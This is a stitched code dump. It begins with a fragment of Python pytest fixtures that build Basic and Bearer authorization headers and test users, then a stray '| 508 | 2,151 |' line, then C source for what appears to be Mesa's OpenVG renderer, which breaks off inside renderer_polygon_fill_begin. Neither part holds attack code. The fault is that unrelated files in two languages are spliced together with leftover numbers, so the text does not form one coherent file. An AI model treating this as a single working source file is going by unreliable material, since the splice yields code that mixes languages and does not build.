encoded = base64.standard_b64encode(user_pass).decode("ascii")
return {"Authorization": f"Basic {encoded}"}
return _make_headers
@pytest.fixture
def token_auth_header(db_session, factories, user):
token = factories.DeveloperToken(userid=user.userid)
db_session.add(token)
db_session.commit()
return {"Authorization": f"Bearer {token.value}"}
@pytest.fixture
def _user_for_authority(db_session, factories):
def _make_user(authority):
user = factories.User(authority=authority)
db_session.commit()
return user
return _make_user
| 508 |
2,151 |
/**************************************************************************
*
* Copyright 2009 VMware, Inc. All Rights Reserved.
* Copyright 2010 LunarG, Inc. All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the
* "Software"), to deal in the Software without restriction, including
* without limitation the rights to use, copy, modify, merge, publish,
* distribute, sub license, and/or sell copies of the Software, and to
* permit persons to whom the Software is furnished to do so, subject to
* the following conditions:
*
* The above copyright notice and this permission notice (including the
* next paragraph) shall be included in all copies or substantial portions
* of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
* MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT.
* IN NO EVENT SHALL VMWARE AND/OR ITS SUPPLIERS BE LIABLE FOR
* ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
* TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
* SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*
**************************************************************************/
#include "renderer.h"
#include "vg_context.h"
#include "pipe/p_context.h"
#include "pipe/p_state.h"
#include "util/u_inlines.h"
#include "pipe/p_screen.h"
#include "pipe/p_shader_tokens.h"
#include "util/u_draw_quad.h"
#include "util/u_simple_shaders.h"
#include "util/u_memory.h"
#include "util/u_sampler.h"
#include "util/u_surface.h"
#include "util/u_math.h"
#include "util/u_format.h"
#include "cso_cache/cso_context.h"
#include "tgsi/tgsi_ureg.h"
typedef enum {
RENDERER_STATE_INIT,
RENDERER_STATE_COPY,
RENDERER_STATE_DRAWTEX,
RENDERER_STATE_SCISSOR,
RENDERER_STATE_CLEAR,
RENDERER_STATE_FILTER,
RENDERER_STATE_POLYGON_STENCIL,
RENDERER_STATE_POLYGON_FILL,
NUM_RENDERER_STATES
} RendererState;
typedef enum {
RENDERER_VS_PLAIN,
RENDERER_VS_COLOR,
RENDERER_VS_TEXTURE,
NUM_RENDERER_VS
} RendererVs;
typedef enum {
RENDERER_FS_COLOR,
RENDERER_FS_TEXTURE,
RENDERER_FS_SCISSOR,
RENDERER_FS_WHITE,
NUM_RENDERER_FS
} RendererFs;
struct renderer {
struct pipe_context *pipe;
struct cso_context *cso;
VGbitfield dirty;
struct {
struct pipe_rasterizer_state rasterizer;
struct pipe_depth_stencil_alpha_state dsa;
struct pipe_framebuffer_state fb;
} g3d;
struct matrix projection;
struct matrix mvp;
struct pipe_resource *vs_cbuf;
struct pipe_resource *fs_cbuf;
VGfloat fs_cbuf_data[32];
VGint fs_cbuf_len;
struct pipe_vertex_element velems[2];
VGfloat vertices[4][2][4];
void *cached_vs[NUM_RENDERER_VS];
void *cached_fs[NUM_RENDERER_FS];
RendererState state;
/* state data */
union {
struct {
VGint tex_width;
VGint tex_height;
} copy;
struct {
VGint tex_width;
VGint tex_height;
} drawtex;
struct {
VGboolean restore_dsa;
} scissor;
struct {
VGboolean use_sampler;
VGint tex_width, tex_height;
} filter;
struct {
struct pipe_depth_stencil_alpha_state dsa;
VGboolean manual_two_sides;
VGboolean restore_dsa;
} polygon_stencil;
} u;
};
/**
* Return VG_TRUE if the renderer can use the resource as the asked bindings.
*/
static VGboolean renderer_can_support(struct renderer *renderer,
struct pipe_resource *res,
unsigned bindings)
{
struct pipe_screen *screen = renderer->pipe->screen;
return screen->is_format_supported(screen,
res->format, res->target, 0, bindings);
}
/**
* Set the model-view-projection matrix used by vertex shaders.
*/
static void renderer_set_mvp(struct renderer *renderer,
const struct matrix *mvp)
{
struct matrix *cur = &renderer->mvp;
struct pipe_resource *cbuf;
VGfloat consts[3][4];
VGint i;
/* projection only */
if (!mvp)
mvp = &renderer->projection;
/* re-upload only if necessary */
if (memcmp(cur, mvp, sizeof(*mvp)) == 0)
return;
/* 3x3 matrix to 3 constant vectors (no Z) */
for (i = 0; i < 3; i++) {
consts[i][0] = mvp->m[i + 0];
consts[i][1] = mvp->m[i + 3];
consts[i][2] = 0.0f;
consts[i][3] = mvp->m[i + 6];
}
cbuf = renderer->vs_cbuf;
pipe_resource_reference(&cbuf, NULL);
cbuf = pipe_buffer_create(renderer->pipe->screen,
PIPE_BIND_CONSTANT_BUFFER,
PIPE_USAGE_STATIC,
sizeof(consts));
if (cbuf) {
pipe_buffer_write(renderer->pipe, cbuf,
0, sizeof(consts), consts);
}
pipe_set_constant_buffer(renderer->pipe,
PIPE_SHADER_VERTEX, 0, cbuf);
memcpy(cur, mvp, sizeof(*mvp));
renderer->vs_cbuf = cbuf;
}
/**
* Create a simple vertex shader that passes through position and the given
* attribute.
*/
static void *create_passthrough_vs(struct pipe_context *pipe, int semantic_name)
{
struct ureg_program *ureg;
struct ureg_src src[2], constants[3];
struct ureg_dst dst[2], tmp;
int i;
ureg = ureg_create(TGSI_PROCESSOR_VERTEX);
if (!ureg)
return NULL;
/* position is in user coordinates */
src[0] = ureg_DECL_vs_input(ureg, 0);
dst[0] = ureg_DECL_output(ureg, TGSI_SEMANTIC_POSITION, 0);
tmp = ureg_DECL_temporary(ureg);
for (i = 0; i < Elements(constants); i++)
constants[i] = ureg_DECL_constant(ureg, i);
/* transform to clipped coordinates */
ureg_DP4(ureg, ureg_writemask(tmp, TGSI_WRITEMASK_X), src[0], constants[0]);
ureg_DP4(ureg, ureg_writemask(tmp, TGSI_WRITEMASK_Y), src[0], constants[1]);
ureg_MOV(ureg, ureg_writemask(tmp, TGSI_WRITEMASK_Z), src[0]);
ureg_DP4(ureg, ureg_writemask(tmp, TGSI_WRITEMASK_W), src[0], constants[2]);
ureg_MOV(ureg, dst[0], ureg_src(tmp));
if (semantic_name >= 0) {
src[1] = ureg_DECL_vs_input(ureg, 1);
dst[1] = ureg_DECL_output(ureg, semantic_name, 0);
ureg_MOV(ureg, dst[1], src[1]);
}
ureg_END(ureg);
return ureg_create_shader_and_destroy(ureg, pipe);
}
/**
* Set renderer vertex shader.
*
* This function modifies vertex_shader state.
*/
static void renderer_set_vs(struct renderer *r, RendererVs id)
{
/* create as needed */
if (!r->cached_vs[id]) {
int semantic_name = -1;
switch (id) {
case RENDERER_VS_PLAIN:
break;
case RENDERER_VS_COLOR:
semantic_name = TGSI_SEMANTIC_COLOR;
break;
case RENDERER_VS_TEXTURE:
semantic_name = TGSI_SEMANTIC_GENERIC;
break;
default:
assert(!"Unknown renderer vs id");
break;
}
r->cached_vs[id] = create_passthrough_vs(r->pipe, semantic_name);
}
cso_set_vertex_shader_handle(r->cso, r->cached_vs[id]);
}
/**
* Create a simple fragment shader that sets the depth to 0.0f.
*/
static void *create_scissor_fs(struct pipe_context *pipe)
{
struct ureg_program *ureg;
struct ureg_dst out;
struct ureg_src imm;
ureg = ureg_create(TGSI_PROCESSOR_FRAGMENT);
out = ureg_DECL_output(ureg, TGSI_SEMANTIC_POSITION, 0);
imm = ureg_imm4f(ureg, 0.0f, 0.0f, 0.0f, 0.0f);
ureg_MOV(ureg, ureg_writemask(out, TGSI_WRITEMASK_Z), imm);
ureg_END(ureg);
return ureg_create_shader_and_destroy(ureg, pipe);
}
/**
* Create a simple fragment shader that sets the color to white.
*/
static void *create_white_fs(struct pipe_context *pipe)
{
struct ureg_program *ureg;
struct ureg_dst out;
struct ureg_src imm;
ureg = ureg_create(TGSI_PROCESSOR_FRAGMENT);
out = ureg_DECL_output(ureg, TGSI_SEMANTIC_COLOR, 0);
imm = ureg_imm4f(ureg, 1.0f, 1.0f, 1.0f, 1.0f);
ureg_MOV(ureg, out, imm);
ureg_END(ureg);
return ureg_create_shader_and_destroy(ureg, pipe);
}
/**
* Set renderer fragment shader.
*
* This function modifies fragment_shader state.
*/
static void renderer_set_fs(struct renderer *r, RendererFs id)
{
/* create as needed */
if (!r->cached_fs[id]) {
void *fs = NULL;
switch (id) {
case RENDERER_FS_COLOR:
fs = util_make_fragment_passthrough_shader(r->pipe);
break;
case RENDERER_FS_TEXTURE:
fs = util_make_fragment_tex_shader(r->pipe,
TGSI_TEXTURE_2D, TGSI_INTERPOLATE_LINEAR);
break;
case RENDERER_FS_SCISSOR:
fs = create_scissor_fs(r->pipe);
break;
case RENDERER_FS_WHITE:
fs = create_white_fs(r->pipe);
break;
default:
assert(!"Unknown renderer fs id");
break;
}
r->cached_fs[id] = fs;
}
cso_set_fragment_shader_handle(r->cso, r->cached_fs[id]);
}
typedef enum {
VEGA_Y0_TOP,
VEGA_Y0_BOTTOM
} VegaOrientation;
static void vg_set_viewport(struct renderer *r,
VegaOrientation orientation)
{
const struct pipe_framebuffer_state *fb = &r->g3d.fb;
struct pipe_viewport_state viewport;
VGfloat y_scale = (orientation == VEGA_Y0_BOTTOM) ? -2.f : 2.f;
viewport.scale[0] = fb->width / 2.f;
viewport.scale[1] = fb->height / y_scale;
viewport.scale[2] = 1.0;
viewport.scale[3] = 1.0;
viewport.translate[0] = fb->width / 2.f;
viewport.translate[1] = fb->height / 2.f;
viewport.translate[2] = 0.0;
viewport.translate[3] = 0.0;
cso_set_viewport(r->cso, &viewport);
}
/**
* Set renderer target.
*
* This function modifies framebuffer and viewport states.
*/
static void renderer_set_target(struct renderer *r,
struct pipe_surface *cbuf,
struct pipe_surface *zsbuf,
VGboolean y0_top)
{
struct pipe_framebuffer_state fb;
memset(&fb, 0, sizeof(fb));
fb.width = cbuf->width;
fb.height = cbuf->height;
fb.cbufs[0] = cbuf;
fb.nr_cbufs = 1;
fb.zsbuf = zsbuf;
cso_set_framebuffer(r->cso, &fb);
vg_set_viewport(r, (y0_top) ? VEGA_Y0_TOP : VEGA_Y0_BOTTOM);
}
/**
* Set renderer blend state. Blending is disabled.
*
* This function modifies blend state.
*/
static void renderer_set_blend(struct renderer *r,
VGbitfield channel_mask)
{
struct pipe_blend_state blend;
memset(&blend, 0, sizeof(blend));
blend.rt[0].rgb_src_factor = PIPE_BLENDFACTOR_ONE;
blend.rt[0].alpha_src_factor = PIPE_BLENDFACTOR_ONE;
blend.rt[0].rgb_dst_factor = PIPE_BLENDFACTOR_ZERO;
blend.rt[0].alpha_dst_factor = PIPE_BLENDFACTOR_ZERO;
if (channel_mask & VG_RED)
blend.rt[0].colormask |= PIPE_MASK_R;
if (channel_mask & VG_GREEN)
blend.rt[0].colormask |= PIPE_MASK_G;
if (channel_mask & VG_BLUE)
blend.rt[0].colormask |= PIPE_MASK_B;
if (channel_mask & VG_ALPHA)
blend.rt[0].colormask |= PIPE_MASK_A;
cso_set_blend(r->cso, &blend);
}
/**
* Set renderer sampler and view states.
*
* This function modifies samplers and fragment_sampler_views states.
*/
static void renderer_set_samplers(struct renderer *r,
uint num_views,
struct pipe_sampler_view **views)
{
struct pipe_sampler_state sampler;
unsigned tex_filter = PIPE_TEX_FILTER_NEAREST;
unsigned tex_wrap = PIPE_TEX_WRAP_CLAMP_TO_EDGE;
uint i;
memset(&sampler, 0, sizeof(sampler));
sampler.min_img_filter = tex_filter;
sampler.mag_img_filter = tex_filter;
sampler.min_mip_filter = PIPE_TEX_MIPFILTER_NONE;
sampler.wrap_s = tex_wrap;
sampler.wrap_t = tex_wrap;
sampler.wrap_r = PIPE_TEX_WRAP_CLAMP_TO_EDGE;
sampler.normalized_coords = 1;
/* set samplers */
for (i = 0; i < num_views; i++)
cso_single_sampler(r->cso, PIPE_SHADER_FRAGMENT, i, &sampler);
cso_single_sampler_done(r->cso, PIPE_SHADER_FRAGMENT);
/* set views */
cso_set_sampler_views(r->cso, PIPE_SHADER_FRAGMENT, num_views, views);
}
/**
* Set custom renderer fragment shader, and optionally set samplers and views
* and upload the fragment constant buffer.
*
* This function modifies fragment_shader, samplers and fragment_sampler_views
* states.
*/
static void renderer_set_custom_fs(struct renderer *renderer,
void *fs,
const struct pipe_sampler_state **samplers,
struct pipe_sampler_view **views,
VGint num_samplers,
const void *const_buffer,
VGint const_buffer_len)
{
cso_set_fragment_shader_handle(renderer->cso, fs);
/* set samplers and views */
if (num_samplers) {
cso_set_samplers(renderer->cso, PIPE_SHADER_FRAGMENT, num_samplers, samplers);
cso_set_sampler_views(renderer->cso, PIPE_SHADER_FRAGMENT, num_samplers, views);
}
/* upload fs constant buffer */
if (const_buffer_len) {
struct pipe_resource *cbuf = renderer->fs_cbuf;
if (!cbuf || renderer->fs_cbuf_len != const_buffer_len ||
memcmp(renderer->fs_cbuf_data, const_buffer, const_buffer_len)) {
pipe_resource_reference(&cbuf, NULL);
cbuf = pipe_buffer_create(renderer->pipe->screen,
PIPE_BIND_CONSTANT_BUFFER, PIPE_USAGE_STATIC,
const_buffer_len);
pipe_buffer_write(renderer->pipe, cbuf, 0,
const_buffer_len, const_buffer);
pipe_set_constant_buffer(renderer->pipe,
PIPE_SHADER_FRAGMENT, 0, cbuf);
renderer->fs_cbuf = cbuf;
if (const_buffer_len <= sizeof(renderer->fs_cbuf_data)) {
memcpy(renderer->fs_cbuf_data, const_buffer, const_buffer_len);
renderer->fs_cbuf_len = const_buffer_len;
}
else {
renderer->fs_cbuf_len = 0;
}
}
}
}
/**
* Setup renderer quad position.
*/
static void renderer_quad_pos(struct renderer *r,
VGfloat x0, VGfloat y0,
VGfloat x1, VGfloat y1,
VGboolean scissor)
{
VGfloat z;
/* the depth test is used for scissoring */
z = (scissor) ? 0.0f : 1.0f;
/* positions */
r->vertices[0][0][0] = x0;
r->vertices[0][0][1] = y0;
r->vertices[0][0][2] = z;
r->vertices[1][0][0] = x1;
r->vertices[1][0][1] = y0;
r->vertices[1][0][2] = z;
r->vertices[2][0][0] = x1;
r->vertices[2][0][1] = y1;
r->vertices[2][0][2] = z;
r->vertices[3][0][0] = x0;
r->vertices[3][0][1] = y1;
r->vertices[3][0][2] = z;
}
/**
* Setup renderer quad texture coordinates.
*/
static void renderer_quad_texcoord(struct renderer *r,
VGfloat x0, VGfloat y0,
VGfloat x1, VGfloat y1,
VGint tex_width, VGint tex_height)
{
VGfloat s0, t0, s1, t1, r0, q0;
VGint i;
s0 = x0 / tex_width;
s1 = x1 / tex_width;
t0 = y0 / tex_height;
t1 = y1 / tex_height;
r0 = 0.0f;
q0 = 1.0f;
/* texcoords */
r->vertices[0][1][0] = s0;
r->vertices[0][1][1] = t0;
r->vertices[1][1][0] = s1;
r->vertices[1][1][1] = t0;
r->vertices[2][1][0] = s1;
r->vertices[2][1][1] = t1;
r->vertices[3][1][0] = s0;
r->vertices[3][1][1] = t1;
for (i = 0; i < 4; i++) {
r->vertices[i][1][2] = r0;
r->vertices[i][1][3] = q0;
}
}
/**
* Draw renderer quad.
*/
static void renderer_quad_draw(struct renderer *r)
{
util_draw_user_vertex_buffer(r->cso, r->vertices, PIPE_PRIM_TRIANGLE_FAN,
Elements(r->vertices), /* verts */
Elements(r->vertices[0])); /* attribs/vert */
}
/**
* Prepare the renderer for copying.
*/
VGboolean renderer_copy_begin(struct renderer *renderer,
struct pipe_surface *dst,
VGboolean y0_top,
struct pipe_sampler_view *src)
{
assert(renderer->state == RENDERER_STATE_INIT);
/* sanity check */
if (!renderer_can_support(renderer,
dst->texture, PIPE_BIND_RENDER_TARGET) ||
!renderer_can_support(renderer,
src->texture, PIPE_BIND_SAMPLER_VIEW))
return VG_FALSE;
cso_save_framebuffer(renderer->cso);
cso_save_viewport(renderer->cso);
cso_save_blend(renderer->cso);
cso_save_samplers(renderer->cso, PIPE_SHADER_FRAGMENT);
cso_save_sampler_views(renderer->cso, PIPE_SHADER_FRAGMENT);
cso_save_fragment_shader(renderer->cso);
cso_save_vertex_shader(renderer->cso);
renderer_set_target(renderer, dst, NULL, y0_top);
renderer_set_blend(renderer, ~0);
renderer_set_samplers(renderer, 1, &src);
renderer_set_fs(renderer, RENDERER_FS_TEXTURE);
renderer_set_vs(renderer, RENDERER_VS_TEXTURE);
renderer_set_mvp(renderer, NULL);
/* remember the texture size */
renderer->u.copy.tex_width = src->texture->width0;
renderer->u.copy.tex_height = src->texture->height0;
renderer->state = RENDERER_STATE_COPY;
return VG_TRUE;
}
/**
* Draw into the destination rectangle given by (x, y, w, h). The texture is
* sampled from within the rectangle given by (sx, sy, sw, sh).
*
* The coordinates are in surface coordinates.
*/
void renderer_copy(struct renderer *renderer,
VGint x, VGint y, VGint w, VGint h,
VGint sx, VGint sy, VGint sw, VGint sh)
{
assert(renderer->state == RENDERER_STATE_COPY);
/* there is no depth buffer for scissoring anyway */
renderer_quad_pos(renderer, x, y, x + w, y + h, VG_FALSE);
renderer_quad_texcoord(renderer, sx, sy, sx + sw, sy + sh,
renderer->u.copy.tex_width,
renderer->u.copy.tex_height);
renderer_quad_draw(renderer);
}
/**
* End copying and restore the states.
*/
void renderer_copy_end(struct renderer *renderer)
{
assert(renderer->state == RENDERER_STATE_COPY);
cso_restore_framebuffer(renderer->cso);
cso_restore_viewport(renderer->cso);
cso_restore_blend(renderer->cso);
cso_restore_samplers(renderer->cso, PIPE_SHADER_FRAGMENT);
cso_restore_sampler_views(renderer->cso, PIPE_SHADER_FRAGMENT);
cso_restore_fragment_shader(renderer->cso);
cso_restore_vertex_shader(renderer->cso);
renderer->state = RENDERER_STATE_INIT;
}
/**
* Prepare the renderer for textured drawing.
*/
VGboolean renderer_drawtex_begin(struct renderer *renderer,
struct pipe_sampler_view *src)
{
assert(renderer->state == RENDERER_STATE_INIT);
if (!renderer_can_support(renderer, src->texture, PIPE_BIND_SAMPLER_VIEW))
return VG_FALSE;
cso_save_blend(renderer->cso);
cso_save_samplers(renderer->cso, PIPE_SHADER_FRAGMENT);
cso_save_sampler_views(renderer->cso, PIPE_SHADER_FRAGMENT);
cso_save_fragment_shader(renderer->cso);
cso_save_vertex_shader(renderer->cso);
renderer_set_blend(renderer, ~0);
renderer_set_samplers(renderer, 1, &src);
renderer_set_fs(renderer, RENDERER_FS_TEXTURE);
renderer_set_vs(renderer, RENDERER_VS_TEXTURE);
renderer_set_mvp(renderer, NULL);
/* remember the texture size */
renderer->u.drawtex.tex_width = src->texture->width0;
renderer->u.drawtex.tex_height = src->texture->height0;
renderer->state = RENDERER_STATE_DRAWTEX;
return VG_TRUE;
}
/**
* Draw into the destination rectangle given by (x, y, w, h). The texture is
* sampled from within the rectangle given by (sx, sy, sw, sh).
*
* The coordinates are in surface coordinates.
*/
void renderer_drawtex(struct renderer *renderer,
VGint x, VGint y, VGint w, VGint h,
VGint sx, VGint sy, VGint sw, VGint sh)
{
assert(renderer->state == RENDERER_STATE_DRAWTEX);
/* with scissoring */
renderer_quad_pos(renderer, x, y, x + w, y + h, VG_TRUE);
renderer_quad_texcoord(renderer, sx, sy, sx + sw, sy + sh,
renderer->u.drawtex.tex_width,
renderer->u.drawtex.tex_height);
renderer_quad_draw(renderer);
}
/**
* End textured drawing and restore the states.
*/
void renderer_drawtex_end(struct renderer *renderer)
{
assert(renderer->state == RENDERER_STATE_DRAWTEX);
cso_restore_blend(renderer->cso);
cso_restore_samplers(renderer->cso, PIPE_SHADER_FRAGMENT);
cso_restore_sampler_views(renderer->cso, PIPE_SHADER_FRAGMENT);
cso_restore_fragment_shader(renderer->cso);
cso_restore_vertex_shader(renderer->cso);
renderer->state = RENDERER_STATE_INIT;
}
/**
* Prepare the renderer for scissor update. This will reset the depth buffer
* to 1.0f.
*/
VGboolean renderer_scissor_begin(struct renderer *renderer,
VGboolean restore_dsa)
{
struct pipe_depth_stencil_alpha_state dsa;
assert(renderer->state == RENDERER_STATE_INIT);
if (restore_dsa)
cso_save_depth_stencil_alpha(renderer->cso);
cso_save_blend(renderer->cso);
cso_save_fragment_shader(renderer->cso);
/* enable depth writes */
memset(&dsa, 0, sizeof(dsa));
dsa.depth.enabled = 1;
dsa.depth.writemask = 1;
dsa.depth.func = PIPE_FUNC_ALWAYS;
cso_set_depth_stencil_alpha(renderer->cso, &dsa);
/* disable color writes */
renderer_set_blend(renderer, 0);
renderer_set_fs(renderer, RENDERER_FS_SCISSOR);
renderer_set_mvp(renderer, NULL);
renderer->u.scissor.restore_dsa = restore_dsa;
renderer->state = RENDERER_STATE_SCISSOR;
/* clear the depth buffer to 1.0f */
renderer->pipe->clear(renderer->pipe,
PIPE_CLEAR_DEPTHSTENCIL, NULL, 1.0f, 0);
return VG_TRUE;
}
/**
* Add a scissor rectangle. Depth values inside the rectangle will be set to
* 0.0f.
*/
void renderer_scissor(struct renderer *renderer,
VGint x, VGint y, VGint width, VGint height)
{
assert(renderer->state == RENDERER_STATE_SCISSOR);
renderer_quad_pos(renderer, x, y, x + width, y + height, VG_FALSE);
renderer_quad_draw(renderer);
}
/**
* End scissor update and restore the states.
*/
void renderer_scissor_end(struct renderer *renderer)
{
assert(renderer->state == RENDERER_STATE_SCISSOR);
if (renderer->u.scissor.restore_dsa)
cso_restore_depth_stencil_alpha(renderer->cso);
cso_restore_blend(renderer->cso);
cso_restore_fragment_shader(renderer->cso);
renderer->state = RENDERER_STATE_INIT;
}
/**
* Prepare the renderer for clearing.
*/
VGboolean renderer_clear_begin(struct renderer *renderer)
{
assert(renderer->state == RENDERER_STATE_INIT);
cso_save_blend(renderer->cso);
cso_save_fragment_shader(renderer->cso);
cso_save_vertex_shader(renderer->cso);
renderer_set_blend(renderer, ~0);
renderer_set_fs(renderer, RENDERER_FS_COLOR);
renderer_set_vs(renderer, RENDERER_VS_COLOR);
renderer_set_mvp(renderer, NULL);
renderer->state = RENDERER_STATE_CLEAR;
return VG_TRUE;
}
/**
* Clear the framebuffer with the specified region and color.
*
* The coordinates are in surface coordinates.
*/
void renderer_clear(struct renderer *renderer,
VGint x, VGint y, VGint width, VGint height,
const VGfloat color[4])
{
VGuint i;
assert(renderer->state == RENDERER_STATE_CLEAR);
renderer_quad_pos(renderer, x, y, x + width, y + height, VG_TRUE);
for (i = 0; i < 4; i++)
memcpy(renderer->vertices[i][1], color, sizeof(VGfloat) * 4);
renderer_quad_draw(renderer);
}
/**
* End clearing and retore the states.
*/
void renderer_clear_end(struct renderer *renderer)
{
assert(renderer->state == RENDERER_STATE_CLEAR);
cso_restore_blend(renderer->cso);
cso_restore_fragment_shader(renderer->cso);
cso_restore_vertex_shader(renderer->cso);
renderer->state = RENDERER_STATE_INIT;
}
/**
* Prepare the renderer for image filtering.
*/
VGboolean renderer_filter_begin(struct renderer *renderer,
struct pipe_resource *dst,
VGboolean y0_top,
VGbitfield channel_mask,
const struct pipe_sampler_state **samplers,
struct pipe_sampler_view **views,
VGint num_samplers,
void *fs,
const void *const_buffer,
VGint const_buffer_len)
{
struct pipe_surface *surf, surf_tmpl;
assert(renderer->state == RENDERER_STATE_INIT);
if (!fs)
return VG_FALSE;
if (!renderer_can_support(renderer, dst, PIPE_BIND_RENDER_TARGET))
return VG_FALSE;
u_surface_default_template(&surf_tmpl, dst,
PIPE_BIND_RENDER_TARGET);
surf = renderer->pipe->create_surface(renderer->pipe, dst, &surf_tmpl);
if (!surf)
return VG_FALSE;
cso_save_framebuffer(renderer->cso);
cso_save_viewport(renderer->cso);
cso_save_blend(renderer->cso);
/* set the image as the target */
renderer_set_target(renderer, surf, NULL, y0_top);
pipe_surface_reference(&surf, NULL);
renderer_set_blend(renderer, channel_mask);
if (num_samplers) {
struct pipe_resource *tex;
cso_save_samplers(renderer->cso, PIPE_SHADER_FRAGMENT);
cso_save_sampler_views(renderer->cso, PIPE_SHADER_FRAGMENT);
cso_save_fragment_shader(renderer->cso);
cso_save_vertex_shader(renderer->cso);
renderer_set_custom_fs(renderer, fs,
samplers, views, num_samplers,
const_buffer, const_buffer_len);
renderer_set_vs(renderer, RENDERER_VS_TEXTURE);
tex = views[0]->texture;
renderer->u.filter.tex_width = tex->width0;
renderer->u.filter.tex_height = tex->height0;
renderer->u.filter.use_sampler = VG_TRUE;
}
else {
cso_save_fragment_shader(renderer->cso);
renderer_set_custom_fs(renderer, fs, NULL, NULL, 0,
const_buffer, const_buffer_len);
renderer->u.filter.use_sampler = VG_FALSE;
}
renderer_set_mvp(renderer, NULL);
renderer->state = RENDERER_STATE_FILTER;
return VG_TRUE;
}
/**
* Draw into a rectangle of the destination with the specified region of the
* texture(s).
*
* The coordinates are in surface coordinates.
*/
void renderer_filter(struct renderer *renderer,
VGint x, VGint y, VGint w, VGint h,
VGint sx, VGint sy, VGint sw, VGint sh)
{
assert(renderer->state == RENDERER_STATE_FILTER);
renderer_quad_pos(renderer, x, y, x + w, y + h, VG_FALSE);
if (renderer->u.filter.use_sampler) {
renderer_quad_texcoord(renderer, sx, sy, sx + sw, sy + sh,
renderer->u.filter.tex_width,
renderer->u.filter.tex_height);
}
renderer_quad_draw(renderer);
}
/**
* End image filtering and restore the states.
*/
void renderer_filter_end(struct renderer *renderer)
{
assert(renderer->state == RENDERER_STATE_FILTER);
if (renderer->u.filter.use_sampler) {
cso_restore_samplers(renderer->cso, PIPE_SHADER_FRAGMENT);
cso_restore_sampler_views(renderer->cso, PIPE_SHADER_FRAGMENT);
cso_restore_vertex_shader(renderer->cso);
}
cso_restore_framebuffer(renderer->cso);
cso_restore_viewport(renderer->cso);
cso_restore_blend(renderer->cso);
cso_restore_fragment_shader(renderer->cso);
renderer->state = RENDERER_STATE_INIT;
}
/**
* Prepare the renderer for polygon silhouette rendering.
*/
VGboolean renderer_polygon_stencil_begin(struct renderer *renderer,
struct pipe_vertex_element *velem,
VGFillRule rule,
VGboolean restore_dsa)
{
struct pipe_depth_stencil_alpha_state *dsa;
VGboolean manual_two_sides;
assert(renderer->state == RENDERER_STATE_INIT);
cso_save_vertex_elements(renderer->cso);
cso_save_blend(renderer->cso);
cso_save_depth_stencil_alpha(renderer->cso);
cso_set_vertex_elements(renderer->cso, 1, velem);
/* disable color writes */
renderer_set_blend(renderer, 0);
manual_two_sides = VG_FALSE;
dsa = &renderer->u.polygon_stencil.dsa;
memset(dsa, 0, sizeof(*dsa));
if (rule == VG_EVEN_ODD) {
dsa->stencil[0].enabled = 1;
dsa->stencil[0].writemask = 1;
dsa->stencil[0].fail_op = PIPE_STENCIL_OP_KEEP;
dsa->stencil[0].zfail_op = PIPE_STENCIL_OP_KEEP;
dsa->stencil[0].zpass_op = PIPE_STENCIL_OP_INVERT;
dsa->stencil[0].func = PIPE_FUNC_ALWAYS;
dsa->stencil[0].valuemask = ~0;
}
else {
assert(rule == VG_NON_ZERO);
/* front face */
dsa->stencil[0].enabled = 1;
dsa->stencil[0].writemask = ~0;
dsa->stencil[0].fail_op = PIPE_STENCIL_OP_KEEP;
dsa->stencil[0].zfail_op = PIPE_STENCIL_OP_KEEP;
dsa->stencil[0].zpass_op = PIPE_STENCIL_OP_INCR_WRAP;
dsa->stencil[0].func = PIPE_FUNC_ALWAYS;
dsa->stencil[0].valuemask = ~0;
if (renderer->pipe->screen->get_param(renderer->pipe->screen,
PIPE_CAP_TWO_SIDED_STENCIL)) {
/* back face */
dsa->stencil[1] = dsa->stencil[0];
dsa->stencil[1].zpass_op = PIPE_STENCIL_OP_DECR_WRAP;
}
else {
manual_two_sides = VG_TRUE;
}
}
cso_set_depth_stencil_alpha(renderer->cso, dsa);
if (manual_two_sides)
cso_save_rasterizer(renderer->cso);
renderer->u.polygon_stencil.manual_two_sides = manual_two_sides;
renderer->u.polygon_stencil.restore_dsa = restore_dsa;
renderer->state = RENDERER_STATE_POLYGON_STENCIL;
return VG_TRUE;
}
/**
* Render a polygon silhouette to stencil buffer.
*/
void renderer_polygon_stencil(struct renderer *renderer,
struct pipe_vertex_buffer *vbuf,
VGuint mode, VGuint start, VGuint count)
{
assert(renderer->state == RENDERER_STATE_POLYGON_STENCIL);
cso_set_vertex_buffers(renderer->cso, 1, vbuf);
if (!renderer->u.polygon_stencil.manual_two_sides) {
cso_draw_arrays(renderer->cso, mode, start, count);
}
else {
struct pipe_rasterizer_state raster;
struct pipe_depth_stencil_alpha_state dsa;
raster = renderer->g3d.rasterizer;
dsa = renderer->u.polygon_stencil.dsa;
/* front */
raster.cull_face = PIPE_FACE_BACK;
dsa.stencil[0].zpass_op = PIPE_STENCIL_OP_INCR_WRAP;
cso_set_rasterizer(renderer->cso, &raster);
cso_set_depth_stencil_alpha(renderer->cso, &dsa);
cso_draw_arrays(renderer->cso, mode, start, count);
/* back */
raster.cull_face = PIPE_FACE_FRONT;
dsa.stencil[0].zpass_op = PIPE_STENCIL_OP_DECR_WRAP;
cso_set_rasterizer(renderer->cso, &raster);
cso_set_depth_stencil_alpha(renderer->cso, &dsa);
cso_draw_arrays(renderer->cso, mode, start, count);
}
}
/**
* End polygon silhouette rendering.
*/
void renderer_polygon_stencil_end(struct renderer *renderer)
{
assert(renderer->state == RENDERER_STATE_POLYGON_STENCIL);
if (renderer->u.polygon_stencil.manual_two_sides)
cso_restore_rasterizer(renderer->cso);
cso_restore_vertex_elements(renderer->cso);
/* restore color writes */
cso_restore_blend(renderer->cso);
if (renderer->u.polygon_stencil.restore_dsa)
cso_restore_depth_stencil_alpha(renderer->cso);
renderer->state = RENDERER_STATE_INIT;
}
/**
* Prepare the renderer for polygon filling.
*/
VGboolean renderer_polygon_fill_begin(struct renderer *renderer,
VGboolean save_dsa)
{
struct pipe_depth_stencil_alpha_state dsa;
assert(renderer->state == RENDERER_STATE_INIT);
if (save_dsa)
cso_save_depth_stencil_alpha(renderer->cso);
/* setup stencil ops */
memset(&dsa, 0, sizeof(dsa));
